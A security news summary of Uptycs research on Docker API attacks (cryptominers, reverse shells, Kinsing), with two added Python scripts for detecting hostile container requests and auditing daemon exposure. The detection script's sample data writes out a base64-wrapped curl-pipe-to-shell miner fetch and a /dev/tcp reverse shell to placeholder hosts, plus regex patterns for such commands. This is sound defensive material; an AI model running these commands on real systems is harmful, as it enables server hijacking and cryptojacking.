Researchers have spotted ongoing malicious campaigns in a Docker honeypot targeting the exposed Docker API port 2375. The attacks are linked to cryptominers and reverse shells on exposed servers.

Attacks on Docker installations

The Uptycs Threat Research team detected attacks that used base64-encoded commands to evade defensive mechanisms. The team observed several attack types: coinminer, shell script, and reverse shell.
  • The coinminer attack uses various shell scripts to drop malicious components by deploying genuine Docker images on servers exposed through the Docker API. 
  • Another type of cryptominer attack involves heavy obfuscation to evade static defenses. When the shell script executes, the XMRig miner is downloaded from GitHub and mining starts soon after.
  • The third type is a reverse shell attack, in which attackers execute a reverse shell on the exposed servers.
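The three attack types above share one entry point, a container-create request sent to the exposed API, and one evasion trick, a base64-wrapped command. The following detection routine is an added example, not Uptycs or Cyware code: it takes Docker Engine API "create container" bodies, unwraps any embedded base64, and scores the raw and decoded command text against coarse indicators for miners, reverse shells, remote fetch-and-execute pipelines, and host-escape settings. The three request bodies, the hostname example.invalid and the address 198.51.100.7 are constructed placeholders.

```python
import base64
import re

# --- constructed sample input -------------------------------------------------
# Three Docker Engine API "create container" bodies of the kind an exposed
# tcp/2375 listener (or a honeypot emulating one) would receive. They are made
# up for this example; example.invalid and 198.51.100.7 are placeholders.

def _b64_wrapped(payload: str) -> str:
    """Wrap a command the way the observed attacks did: echo <b64> | base64 -d | sh."""
    return "echo " + base64.b64encode(payload.encode()).decode() + " | base64 -d | sh"

SAMPLE_REQUESTS = [
    # benign: a plain web server
    {"Image": "nginx:latest", "Cmd": ["nginx", "-g", "daemon off;"], "HostConfig": {}},
    # genuine alpine image used to fetch and run a miner script, host root mounted
    {
        "Image": "alpine:latest",
        "Cmd": ["sh", "-c", _b64_wrapped("curl -s http://example.invalid/xmrig.sh | sh")],
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
    },
    # reverse shell to a placeholder address, hidden behind base64
    {
        "Image": "ubuntu:latest",
        "Cmd": ["bash", "-c", _b64_wrapped("bash -i >& /dev/tcp/198.51.100.7/4444 0>&1")],
        "HostConfig": {},
    },
]

# --- detection ----------------------------------------------------------------
B64_PIPE_RE = re.compile(r"base64\s+(?:-d|--decode)\b")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Coarse indicators applied to raw and decoded command text. A lone
# "kill competing miners" hit is weak evidence; the others are stronger.
INDICATORS = {
    "miner": re.compile(r"xmrig|minerd|stratum\+tcp|cryptonight", re.I),
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\s+-e\b|bash\s+-i\b", re.I),
    "remote_fetch_exec": re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b", re.I),
    "kill_competing_miners": re.compile(r"\b(?:pkill|killall)\b|docker\s+(?:kill|rm)\b", re.I),
}


def joined_command(req: dict) -> str:
    """Flatten Entrypoint and Cmd into one string for pattern matching."""
    parts = []
    for key in ("Entrypoint", "Cmd"):
        value = req.get(key)
        if isinstance(value, str):
            parts.append(value)
        elif isinstance(value, list):
            parts.extend(str(v) for v in value)
    return " ".join(parts)


def decode_embedded_base64(text: str) -> list:
    """Return the decoded form of every base64 blob in text that yields printable text."""
    decoded = []
    for match in B64_BLOB_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            s = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in s):
            decoded.append(s)
    return decoded


def analyze_create_request(req: dict) -> list:
    """Return a list of human-readable findings for one create-container body."""
    findings = []
    cmd = joined_command(req)
    texts = [cmd]
    if B64_PIPE_RE.search(cmd):
        findings.append("base64-decoded command pipeline")
    decoded = decode_embedded_base64(cmd)
    if decoded:
        findings.append("embedded base64 payload decoded")
        texts.extend(decoded)
    for name, pattern in INDICATORS.items():
        if any(pattern.search(t) for t in texts):
            findings.append(name)
    host = req.get("HostConfig") or {}
    if host.get("Privileged"):
        findings.append("privileged container")
    for bind in host.get("Binds") or []:
        src = bind.split(":")[0]
        if src == "/" or src.startswith("/var/run/docker.sock"):
            findings.append(f"host bind mount: {bind}")
    if host.get("PidMode") == "host":
        findings.append("host PID namespace")
    return findings


def scan_requests(requests: list) -> list:
    """Return (image, findings) for every request that produced at least one finding."""
    hits = []
    for req in requests:
        findings = analyze_create_request(req)
        if findings:
            hits.append((req.get("Image", "?"), findings))
    return hits


if __name__ == "__main__":
    for image, findings in scan_requests(SAMPLE_REQUESTS):
        print(image, "->", ", ".join(findings))
```

The decode step is what makes the base64 evasion pointless for a defender: the indicators run over the unwrapped payload as well as the visible command, so an `echo <blob> | base64 -d | sh` wrapper adds a finding of its own rather than hiding anything. Feed it the JSON bodies from a daemon audit log or honeypot capture and alert on any request with a `miner` or `reverse_shell` hit, or with a host bind mount or privileged flag combined with a base64 pipeline.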

Along with the attacks above, another type of attack involving the Kinsing malware was observed.

The Kinsing attacks

The most frequently observed attack is by Kinsing, a malware family seen in attacks on *nix-based systems. 
  • In the Docker honeypot, researchers observed a large volume of Kinsing-related attacks on the exposed servers. 
  • The malware includes various defense-evasion mechanisms and commands, along with a rootkit to hide malicious activity. 
  • The main goal of the attackers is to mine cryptocurrency on the exposed servers.
  • The Kinsing shell script includes Docker-related commands to kill miner processes already running on the system.

Conclusion

Docker containers are becoming a fundamental part of application development. Without proper protections, these servers become exposed and are targeted by attackers as a foothold for further attacks. It is therefore recommended to monitor Docker-related threats regularly and leverage threat intelligence for better protection.
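Every campaign on this page starts with a daemon that answers on TCP port 2375 without authentication, so the single most useful check is whether your own daemon is configured that way. The script below is an added example, not part of the Cyware or Uptycs material: it reads the `hosts` and TLS keys from a `daemon.json` document and the `-H`/`--tlsverify` flags from a systemd `ExecStart=` line, and reports each TCP listener by the level of access a remote client would get. The weak and hardened configuration fragments are constructed for the example, with the usual convention of 2375 for plaintext and 2376 for TLS.

```python
import json
import shlex

# dockerd listens only on the local socket when no hosts are configured
DEFAULT_HOSTS = ["unix:///var/run/docker.sock"]

# --- constructed configuration fragments (not from any real host) --------------
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
WEAK_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"


def parse_daemon_json(text: str):
    """Return (hosts, tls, tlsverify) from a daemon.json document."""
    cfg = json.loads(text)
    hosts = cfg.get("hosts") or DEFAULT_HOSTS
    tlsverify = bool(cfg.get("tlsverify", False))
    tls = bool(cfg.get("tls", False)) or tlsverify  # tlsverify implies tls
    return hosts, tls, tlsverify


def parse_execstart(line: str):
    """Return (hosts, tls, tlsverify) from a systemd ExecStart= line for dockerd."""
    argv = shlex.split(line.split("=", 1)[1])
    hosts, tls, tlsverify = [], False, False
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 1
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        elif arg in ("--tls", "--tls=true"):
            tls = True
        i += 1
    return hosts or DEFAULT_HOSTS, tls or tlsverify, tlsverify


def assess_exposure(hosts, tls: bool, tlsverify: bool) -> list:
    """One finding per TCP listener; unix:// and fd:// listeners are local-only."""
    findings = []
    for host in hosts:
        if not host.startswith("tcp://"):
            continue
        addr = host[len("tcp://"):]
        bound_everywhere = addr.rsplit(":", 1)[0] in ("", "0.0.0.0", "[::]")
        if not tls:
            findings.append(f"CRITICAL {host}: no TLS, anyone who can reach the port "
                            "can create privileged containers with host mounts")
        elif not tlsverify:
            findings.append(f"HIGH {host}: TLS without client certificate verification, "
                            "encrypted but unauthenticated")
        elif bound_everywhere:
            findings.append(f"INFO {host}: mutual TLS in place; still restrict "
                            "reachability with a firewall")
    return findings


def check_daemon_json(text: str) -> list:
    return assess_exposure(*parse_daemon_json(text))


def check_execstart(line: str) -> list:
    return assess_exposure(*parse_execstart(line))


if __name__ == "__main__":
    for label, result in (("weak daemon.json", check_daemon_json(WEAK_DAEMON_JSON)),
                          ("hardened daemon.json", check_daemon_json(HARDENED_DAEMON_JSON)),
                          ("weak ExecStart", check_execstart(WEAK_EXECSTART))):
        print(label, "->", result or ["OK: no TCP listener"])
```

Run it against `/etc/docker/daemon.json` and the output of `systemctl cat docker` on each host; a CRITICAL line is exactly the condition the honeypot in this report was emulating. Note that `daemon.json` and `ExecStart=` hosts conflict if both are set, so check whichever one your hosts actually use.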
Cyware Publisher
